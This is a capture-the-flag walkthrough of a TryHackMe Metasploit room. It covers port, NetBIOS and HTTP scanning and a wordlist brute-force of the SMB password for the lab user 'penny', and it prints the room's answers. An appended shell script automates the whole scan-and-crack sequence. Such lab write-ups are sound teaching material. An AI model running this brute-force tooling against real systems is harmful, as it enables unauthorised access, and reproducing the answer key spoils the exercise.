Metasploit Exploitation — Scanning | TryHackMe

Iam_Wander
4 min readMay 29, 2023


https://tryhackme.com/room/metasploitexploitation

In this box, we are going to use Metasploit modules to scan for open ports on the target system and to brute-force the SMB password of a user named penny.

It is worth noting that in this room you can use either Nmap or Metasploit to answer the first three questions, so I show both. Let's get straight to it.

Question. How many ports are open on the target system?

Using nmap

Let's enumerate open ports with Nmap. I will take you through the process step by step.

nmap machine_ip

We have 5 open ports. Note that a default Nmap scan only covers its 1,000 most common TCP ports; add -p- to scan all 65,535 if you suspect a service on an unusual port.

Using Metasploit

Let's enumerate open ports using Metasploit, step by step.

  1. Start Metasploit with msfconsole.
  2. List the port-scanning modules with search portscan.

The search returns several modules. Options 3 and 5 in that output can be used to enumerate open ports. Index numbers differ between Metasploit versions, so match on the module name (for example auxiliary/scanner/portscan/tcp) rather than relying on the number.

  3. Proceed with option 5: use 5
  4. It is good practice to run show options to see which parameters are required.
  5. In this case the only option we must set is RHOSTS, the target address (Metasploit also accepts RHOST as an alias). Set it and run the module: set RHOSTS machine_ip, then run.

Bingo, we have 5 open ports, highlighted in green in the output.

Ans: 5 ports

Question. Using the relevant scanner, what NetBIOS name can you see?

Using Nmap

We can use Nmap's default scripts to retrieve the NetBIOS name:

nmap -sV -sC machine_ip

There we have it: ACME IT SUPPORT. Look for the "NetBIOS computer name" line in the SMB script output (smb-os-discovery).

Using Metasploit

Let's begin by searching for NetBIOS modules:

msf6 > search netbios

Option 2 looks viable; the module we want is the NetBIOS name scanner, auxiliary/scanner/netbios/nbname (it queries UDP port 137, so that port must be reachable). Use it and then show options.

Set RHOSTS and run it, then wait for the NetBIOS response.

There you have it.

Ans: ACME IT SUPPORT

Question. What is running on port 8000?

Using Nmap

nmap -sV -p 8000 machine_ip

We have the service and its version now.

Ans: WebFS 1.21

Using Metasploit

TCP port 8000 is commonly used as an alternative HTTP port, so we search for the http_version module:

msf6 > search http_version

Use 0 and then show options.

Set RHOSTS, then change RPORT from its default of 80 (the value shown by show options) to 8000, and run the module. It reports the Server header of the HTTP response.

Ans: webfs/1.21

Question. What is the “penny” user’s SMB password? Use the wordlist mentioned in the previous task.

This challenge is exciting. Here we are required to brute-force penny's password.

From the hint we can see that we should use the smb_login module, so let's begin by searching for it.

The search results for smb_login are shown above. Proceed with option 0 (auxiliary/scanner/smb/smb_login) and run show options to see the parameters to set.

Set RHOSTS first, then set the username: set SMBUser penny

Point the module at the wordlist: set PASS_FILE /usr/share/wordlists/MetasploitRoom/MetasploitWorldlist.txt

Optionally set STOP_ON_SUCCESS true so the module stops at the first valid credential, then run it.

There you have it.

penny's password is leo1234. SMB passwords are case-sensitive, so copy it exactly as the module prints it.

Ans: leo1234
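To tie the four steps together, here is an added example (mine, not part of the original post or of the TryHackMe room) that writes the whole procedure into a Metasploit resource script and replays it non-interactively, plus a small helper that pulls the password out of smb_login's success line. It assumes the module names auxiliary/scanner/portscan/tcp, auxiliary/scanner/netbios/nbname, auxiliary/scanner/http/http_version and auxiliary/scanner/smb/smb_login (the post only refers to them by their index in search output), the wordlist path from the post, and the `Success: '.\user:password'` line format of smb_login; the sample output line is constructed.

```shell
#!/bin/sh
# Added example, not from the original post: automate the room's four
# Metasploit steps with a resource script instead of typing them into
# msfconsole one at a time. Usage: ./thm_scan.sh <target_ip> [user] [wordlist]

# Wordlist path as given in the post (assumption: it exists on the AttackBox).
DEFAULT_WORDLIST="/usr/share/wordlists/MetasploitRoom/MetasploitWorldlist.txt"

# build_rc TARGET USER WORDLIST
# Prints a Metasploit resource script to stdout. Module names are assumed
# (the post only refers to them by their index in "search" output).
build_rc() {
  target="$1"; user="$2"; wordlist="$3"
  cat <<EOF
use auxiliary/scanner/portscan/tcp
set RHOSTS $target
set PORTS 1-10000
set THREADS 10
run
use auxiliary/scanner/netbios/nbname
set RHOSTS $target
run
use auxiliary/scanner/http/http_version
set RHOSTS $target
set RPORT 8000
run
use auxiliary/scanner/smb/smb_login
set RHOSTS $target
set SMBUser $user
set PASS_FILE $wordlist
set STOP_ON_SUCCESS true
run
exit
EOF
}

# extract_password: read smb_login output on stdin and print the password
# from the first "Success: '.\user:password'" line (assumed output format).
# Prints nothing when no success line is present.
extract_password() {
  sed -n "s/.*Success: '[^:]*:\([^']*\)'.*/\1/p" | head -n 1
}

# Constructed sample of an smb_login success line, used for an offline check.
SAMPLE_SMB_LOGIN_LINE="[+] 10.10.1.2:445 - 10.10.1.2:445 - Success: '.\\penny:leo1234'"

# demo_extract: run the extractor over the constructed sample line.
demo_extract() {
  printf '%s\n' "$SAMPLE_SMB_LOGIN_LINE" | extract_password
}

# Only run the scan when a target was given; msfconsole -r replays the script.
if [ -n "${1:-}" ]; then
  rc_file="$(mktemp /tmp/thm_scan.XXXXXX)"
  build_rc "$1" "${2:-penny}" "${3:-$DEFAULT_WORDLIST}" > "$rc_file"
  if command -v msfconsole >/dev/null 2>&1; then
    msfconsole -q -r "$rc_file" | tee /tmp/thm_scan.log
    printf 'SMB password for %s: %s\n' "${2:-penny}" "$(extract_password < /tmp/thm_scan.log)"
  else
    printf 'msfconsole not found; resource script written to %s\n' "$rc_file"
  fi
fi
```

Run it as `./thm_scan.sh machine_ip` on the AttackBox; without a target it only defines the functions, which is handy for sourcing. STOP_ON_SUCCESS keeps the brute-force from hammering the share after the first hit, and the PORTS range matches the module's default so the scan stays comparable to the interactive run in the post. If Nmap is the tool at hand instead, `nmap -sV -sC -p- machine_ip` covers the first three questions in one run.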

Thank you for reading. I hope you learned as much as I did. Metasploit is a very powerful tool and it makes our lives a lot easier.
